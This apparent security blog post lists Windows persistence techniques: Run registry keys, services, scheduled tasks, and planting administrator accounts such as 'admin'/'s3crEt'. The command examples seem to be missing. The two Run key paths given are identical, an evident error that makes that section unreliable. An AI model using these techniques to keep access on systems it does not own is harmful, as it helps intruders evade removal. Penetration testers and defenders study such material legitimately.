Persistence on Windows

In this post, we will describe some persistence techniques on Windows boxes.

Registry key

Some registry keys such as Run allow to define programs to start after a reboot.

There are two instances of the Run registry key:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run: Programs listed here will start when the current user logs in.
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run: Programs listed here will start when the computer starts.

The first instance only requires privileges of the current user, however the second one can only be set by users with administration privileges.

Let’s launch C:\Windows\agent.exe on each session start:

System Service

Services are programs started on each boot. They are started by default with maximum privileges (SYSTEM).

Example:

Scheduled tasks

Scheduled tasks are executed periodically.

Add user

Adding a Windows user is a simple yet efficient solution to maintain our access. Adding a user requires administration privileges.

Adding a local administrator

Adding a new local administrator “admin” with password “s3crEt”.

The local adminstrators group’s name can change with the system’s language (e.g “Administrateurs” in French).

Adding a domain administrator

If we have domain administration privileges, we can add another domain administrator:

Leave a Reply

Your email address will not be published. Required fields are marked *